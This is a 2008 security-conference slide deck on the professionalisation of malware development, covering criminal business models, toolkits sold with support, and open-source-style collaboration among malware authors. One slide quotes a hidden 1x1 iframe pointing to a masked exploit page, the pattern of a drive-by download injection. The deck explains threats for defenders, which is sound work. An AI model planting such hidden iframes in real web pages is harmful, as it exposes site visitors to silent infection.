Copyright ©2008 Savid Technologies, Inc. All Rights Reserved

Professional Development Trends in Malware

Michael A. DavisChief Executive Officer

Savid Technologies, Inc.

http://www.savidtech.com

Copyright ©2008 Savid Technologies, Inc. All Rights Reserved

Agenda

» Who am I?

» State of the Union

» Development Trends

» Questions

Copyright ©2008 Savid Technologies, Inc. All Rights Reserved

About Savid» Michael A. Davis - CEO

» Founded in 2003

» Chicago & DC Offices

» Think Tank of security professionals

» Diverse set of IT skill

» Unique, agile combination of expertise

» Cater to the special security needs of business

» We love what we do and will work hard to meet our

client's needs

Our focus is unique, high-end solutions. We do NOT provide “cookie-cutter” solutions because our clientele do not have “cookie-cutter” problems.

Copyright ©2008 Savid Technologies, Inc. All Rights Reserved

State of the Union» “Protection” is in place…

– 98% use firewalls

– 97% of companies protect machines with antivirus software

– 79% use anti-spyware

– 61% use email monitoring software

» But it’s not enough…

– Cost of malware: $14.2B

– 80% of companies experienced 1 or more successful attacks, 30% had more than 10

– Worldwide, 32% of companies experience attacks involving business partners

– 43% of those were infections, while 27% were unauthorized access

– 75% of enterprises will be infected with malware that evaded traditional defenses

Sources: Computer Security Institute/FBI’s 2006 Computer Crime and Security Survey, Computer Economics, 2006, ICSA Labs, 9th Annual Computer Virus Prevalence Survey, Cybertrust, Risky Business, September 2006, Gartner, Gartner’s Top Predictions for IT Organizations and Users, 2007 & Beyond, December 2006

Copyright ©2008 Savid Technologies, Inc. All Rights Reserved

The Problem - Continued

0

2000

4000

6000

8000

10000

Vulnerabilities reported

per year

Copyright ©2008 Savid Technologies, Inc. All Rights Reserved

Time to Patch

Copyright ©2008 Savid Technologies, Inc. All Rights Reserved

The Threat» Highly organized crime. Their motive is Return

on Investment.

» Fraud, identity theft and extortion has been going on for centuries. Internet has made it exponentially profitable with minimal risk.

» Attacks are extremely sophisticated and one step ahead of defenses.

Copyright ©2008 Savid Technologies, Inc. All Rights Reserved

It’s a Business

"It’s very simple. We buy these products in Western countries with stolen credit cards. You don’t run any risk when purchasing these products."

Image Source: PandaSoftware at http://www.pandasoftware.com

Copyright ©2008 Savid Technologies, Inc. All Rights Reserved

The Tools» Tools are being actively sold to automate

criminal activity.

» These tools have manuals, updates, and even support.

» Price ranges from $20 - $3,000

» Russia is a breeding ground for the development and distribution.

Copyright ©2008 Savid Technologies, Inc. All Rights Reserved

For Sale

Copyright ©2008 Savid Technologies, Inc. All Rights Reserved

Professional Interfaces

Image Source: PandaSoftware at http://www.pandasoftware.com

Copyright ©2008 Savid Technologies, Inc. All Rights Reserved

Partner Programs

Copyright ©2008 Savid Technologies, Inc. All Rights Reserved

Malicious Websites

<iframe src=http://***/ex.php border=0 width=1 height=1></iframe>

Copyright ©2008 Savid Technologies, Inc. All Rights Reserved

Professional Development» Money enables quality

» Teams of developers

» Funded by investors

– Must guarantee ROI

Copyright ©2008 Savid Technologies, Inc. All Rights Reserved

Open Source Development» Different than traditional production

» Highly Distributed

» E-Mail as communication mechanism

» Various Tools

– Version Control

– Bug Tracking System – For Support

– Rudimentary Change Management

– No Project Plans

– Donated Resources/Time

– Contributors pick what they want to do

Copyright ©2008 Savid Technologies, Inc. All Rights Reserved

Multiple Contributors» Virus/Trojan written by one author

» Initial malware written by single author

» Contributors join work on bug testing

» Most malware has 2-10 authors

» Other Contributors

– Host bug system

– Host testing forum

– Donate money

Copyright ©2008 Savid Technologies, Inc. All Rights Reserved

Feature Modifications» No Project Plan

» Contributors work on what is “cool”

– Usually whatever is causing them pain

– E.g, P2P in response to botnet shutdowns

» Money

– Give priority to certain features

– Management Consoles are an example

» Malware Authors Create their own market

– Build frameworks that require customization

Copyright ©2008 Savid Technologies, Inc. All Rights Reserved

Doesn’t Exist

A Silver Bullet

Copyright ©2008 Savid Technologies, Inc. All Rights Reserved

Module Reuse» Mythical Man Month states that the silver

bullet is Module Reuse

» Malware uses tons of Open Source Code

– OpenSSL

– Apache

– Pthreads

– Free Source Code

» This code has been test and is high quality

» Malware frameworks are built upon

– Variants are the problem, not new species

Copyright ©2008 Savid Technologies, Inc. All Rights Reserved

Quality Testing» Version Control enables rolling back of bad

code/branches of code

» Follows Open Source “Build/Release” test framework

» New Released are “Interrupt Driven”

– Only release new versions when the authors feel like it

» Authors hate to support their software

– Automatic update mechanisms

– Change Logs

– Documentation

Copyright ©2008 Savid Technologies, Inc. All Rights Reserved

What does this all mean?» It is all about Return on Investment (ROI)

» Malware is staying longer on workstations

» Malware is taking longer to remove

– Multiple apps/reboots/etc

» Malware is becoming more stealthy within the OS

» Malware infections are more directed and have larger impact

Copyright ©2008 Savid Technologies, Inc. All Rights Reserved

Conclusion» Thank you

» Michael A. Davismdavis@savidtech.com(708) 532-2843

» Questions?